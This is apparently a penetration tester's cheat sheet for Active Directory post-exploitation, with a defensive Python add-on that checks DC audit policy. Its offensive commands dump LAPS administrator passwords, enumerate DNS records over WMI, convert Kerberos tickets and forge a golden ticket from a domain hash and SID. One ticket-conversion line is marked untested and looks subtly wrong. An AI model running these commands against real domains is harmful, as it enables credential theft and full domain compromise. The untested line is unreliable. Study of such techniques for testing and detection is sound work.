Post-Exploitation AD

Dump LAPS password

Get-DomainComputer <COMPUTERNAME|wks*> -Properties samaccountname,ms-mcs-admpwd

Dump DNS records

WMI version compatible with old DCs (can be adapted to wmic.exe if PowerShell is not installed)

On the DC run one of the following (the second form is launched from cmd.exe and can target a remote DC via -ComputerName)

Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT TextRepresentation FROM MicrosoftDNS_AType WHERE ContainerName='<fqdn_domain>'" | fl > raw_records.txt
powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName <DC> -Filter "DomainName = '<fqdn_domain>' AND TimeStamp=0" | fl > raw_records.txt

The output file will be UTF-16 encoded (PowerShell's default for > redirection), so convert it with

dos2unix raw_records.txt

Optional formatting

cat raw_records.txt | grep TextRepresentation | cut -d " " -f 3,6 > a_records.txt

DC event auditing

auditpol /get /category:*
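The auditpol output above tells you which of the activity in these notes a DC will actually log: Kerberos Authentication Service and Kerberos Service Ticket Operations cover ticket requests (4768/4769), and Directory Service Access (with a SACL) covers attribute reads such as ms-Mcs-AdmPwd (4662). The following Python is an added example, not part of the original notes: it parses a constructed auditpol dump embedded inline and reports subcategories that fall below a baseline; the REQUIRED baseline is an assumption for illustration, not a published standard.

```python
"""Parse `auditpol /get /category:*` output and flag audit subcategories
that fall below an expected baseline. Added example; the sample output
below is constructed (not captured from a real host) and the REQUIRED
baseline is an assumption for illustration."""

# Constructed, abridged sample of `auditpol /get /category:*` output.
# Category lines start at column 0; subcategory lines are indented two
# spaces and end with the setting.
SAMPLE_AUDITPOL = """System audit policy
Category/Subcategory                      Setting
Account Logon
  Credential Validation                   Success and Failure
  Kerberos Service Ticket Operations      No Auditing
  Other Account Logon Events              No Auditing
  Kerberos Authentication Service         Success
Account Management
  Computer Account Management             Success
  User Account Management                 Success and Failure
Logon/Logoff
  Logon                                   Success and Failure
  Special Logon                           No Auditing
DS Access
  Directory Service Access                No Auditing
  Directory Service Changes               Success
"""

# Order matters: "Success and Failure" must be tried before "Success"
# and "Failure", which are suffixes of it.
SETTINGS = ("No Auditing", "Success and Failure", "Success", "Failure")

# Assumed baseline for a DC (adjust to your own policy).
REQUIRED = {
    "Kerberos Authentication Service": "Success and Failure",
    "Kerberos Service Ticket Operations": "Success and Failure",
    "Directory Service Access": "Success and Failure",
    "Credential Validation": "Success and Failure",
}


def parse_auditpol(text):
    """Return {subcategory: setting}, skipping header and category lines."""
    policy = {}
    for line in text.splitlines():
        if not line.startswith("  "):
            continue  # header or category line, carries no setting
        stripped = line.strip()
        for setting in SETTINGS:
            if stripped.endswith(setting):
                name = stripped[: -len(setting)].rstrip()
                policy[name] = setting
                break
    return policy


def satisfies(actual, required):
    """True if the actual setting is at least as strong as the required one."""
    if required == "No Auditing":
        return True
    if required == "Success and Failure":
        return actual == "Success and Failure"
    return actual in (required, "Success and Failure")


def audit_gaps(policy, required=REQUIRED):
    """Return {subcategory: (actual, required)} for every required
    subcategory that is absent or weaker than the baseline."""
    gaps = {}
    for name, need in required.items():
        have = policy.get(name, "Not present")
        if not satisfies(have, need):
            gaps[name] = (have, need)
    return gaps


if __name__ == "__main__":
    # On a real host: auditpol /get /category:* > auditpol.txt, then read it.
    found = parse_auditpol(SAMPLE_AUDITPOL)
    for name, (have, need) in sorted(audit_gaps(found).items()):
        print(f"GAP  {name}: have '{have}', need '{need}'")
```

Run it against a saved `auditpol /get /category:*` dump instead of the sample to see which subcategories would leave the activity above invisible in the Security log.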


Ticket converter

Convert ccache tickets into kirbi (KRB-CRED) and vice versa

Raw2B64 - Not tested

cat <ticket.raw> | sed s'| ||'g | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' | base64 -D >> <ticket.b64>

Golden Ticket

Standard Golden

golden_ticket_create -d <domain> -g <relative identifier> -k <hash> -s <SID> -u <user> -t /tmp/golden.tck

DA to EA